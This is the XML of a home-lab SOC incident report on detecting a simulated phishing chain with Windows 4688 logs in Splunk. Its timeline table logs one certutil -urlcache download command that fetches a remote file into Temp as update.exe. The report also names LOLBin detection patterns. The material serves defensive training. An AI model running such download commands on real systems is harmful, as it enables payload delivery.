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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">INCIDENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Attack Detection — Scenario 05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>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Incident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IR-2026-006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Scenario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Phishing Attack Detection</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Date of Simulation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20 June 2026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Analyst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 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Primary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hp</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Severity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E67E22"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium-High</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MITRE ATT&amp;CK Techniques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T1566.001, T1204.002, T1105</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Splunk Enterprise (Search &amp; Reporting), Windows Event Logs (4688)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This scenario simulates a phishing attack chain in which a user receives an email with a malicious attachment. Upon opening the attachment, a macro is triggered which attempts to download and execute a second-stage payload using a Living-off-the-Land Binary (LOLBin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since a real email gateway or mail flow log source was not available in this lab environment, the delivery stage (T1566.001) is narratively simulated, and detection begins at the point where the malicious document's macro would fire — generating real, logged process-creation events from that point forward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated attack narrative:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User receives a phishing email disguised as an invoice, containing a malicious Office attachment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User opens the attachment; the macro fires (simulated).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The macro spawns a LOLBin (certutil.exe) to download a second-stage payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The downloaded payload is executed (simulated).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Query / Investigation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Windows process-creation auditing (Event ID 4688) was active and logging on the lab host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Searched for evidence of the simulated macro trigger (WINWORD reference in command line).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Searched specifically for certutil.exe executions matching known LOLBin download syntax (-urlcache -split -f).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Searched for the simulated payload execution marker (“Payload executed”).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Combined all three indicators into a single chronological query to reconstruct the full attack timeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verified whether the dropped file (update.exe) generated an independent process-creation event upon execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>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200"/>
        <w:gridCol w:w="1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Time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Process</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Command Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Significance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cmd.exe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echo Simulating WINWORD.EXE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Simulated macro trigger (T1566.001/T1204.002)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19:21:14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cmd.exe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echo Payload executed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Payload execution attempt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19:24:48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cmd.exe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echo Payload executed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Payload execution attempt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19:30:03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certutil.exe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-urlcache -split -f https://raw.githubusercontent.com ...\Temp\update.exe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LOLBin payload download (T1105)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Gap Identified: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The dropped file update.exe did not generate its own independent Event ID 4688 entry upon execution. In this simulation, the file was a plain text placeholder rather than a real executable, so it likely did not actually launch as a process. In a real-world attack, a genuine payload would generate a distinct, separately loggable process-creation event. This is documented as a known limitation of the simulation rather than a detection failure of the SPL logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supporting Screenshots: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scenario05_01_macro_and_payload_execution.png — macro trigger and payload execution attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scenario05_02_certutil_download.png — certutil LOLBin payload download (T1105)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scenario05_03_combined_attack_chain.png — full combined attack-chain query result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">19:20:26 — Simulated macro trigger (WINWORD reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">19:21:14 — Simulated payload execution attempt #1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">19:24:48 — Simulated payload execution attempt #2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">19:30:03 — certutil.exe LOLBin payload download (T1105)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: timestamps reflect simulation execution order, not necessarily the order a real attack chain would unfold in (real-world: download typically precedes execution). This is flagged here for analytical transparency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>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Name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T1566.001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Phishing: Spearphishing Attachment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Initial Access (simulated)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T1204.002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User Execution: Malicious File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Execution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T1105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Ingress Tool Transfer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Command and Control / Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Verdict &amp; Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This simulation successfully demonstrates detectable indicators of a phishing-driven execution chain using only native Windows Event ID 4688 logging — no EDR or email gateway required. The most reliable and production-relevant detection in this scenario is the certutil LOLBin download pattern (-urlcache -split -f), which is a well-documented, high-fidelity indicator with very low false-positive risk in most enterprise environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The macro-trigger and payload-execution evidence in this lab are simulated placeholders (using echo and cmd.exe) rather than genuine Office/macro telemetry, since no real malicious document or VBA macro was used. This is an accepted limitation of a safe, non-malicious home lab simulation and is documented transparently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed simulated phishing execution chain — payload delivery and LOLBin-based download technique successfully detected via Windows native logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate the affected host from the network pending full investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminate any active certutil.exe processes with suspicious URL-cache arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Quarantine and analyze the downloaded file (update.exe) in a sandboxed environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset credentials for the affected user account as a precaution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Group Policy restrictions to block or alert on certutil -urlcache usage outside approved administrative contexts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy email attachment sandboxing / detonation for inbound Office documents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable PowerShell Script Block Logging (Event ID 4104) and Sysmon for richer parent-child process visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct user awareness training on phishing identification, focused on invoice/attachment-themed lures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a correlation rule alerting on any LOLBin (certutil, mshta, regsvr32, bitsadmin) making outbound HTTP/HTTPS requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1E3A5F"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 05 demonstrates detection of a simulated phishing attack chain — from malicious attachment execution through LOLBin-based payload download — using native Windows Event ID 4688 logging in Splunk. The investigation highlights both a high-confidence detection technique (certutil URL-cache abuse) and an honest limitation of the simulation, reflecting the kind of nuanced, evidence-based reporting expected of a SOC L1 analyst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1E3A5F" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigated by: Jimil Joshi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Role: SOC L1 Analyst (Simulated Lab Environment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Report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IR-2026-006 | Phishing Attack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2026-06-20T14:22:15.839Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-20T14:22:15.856Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>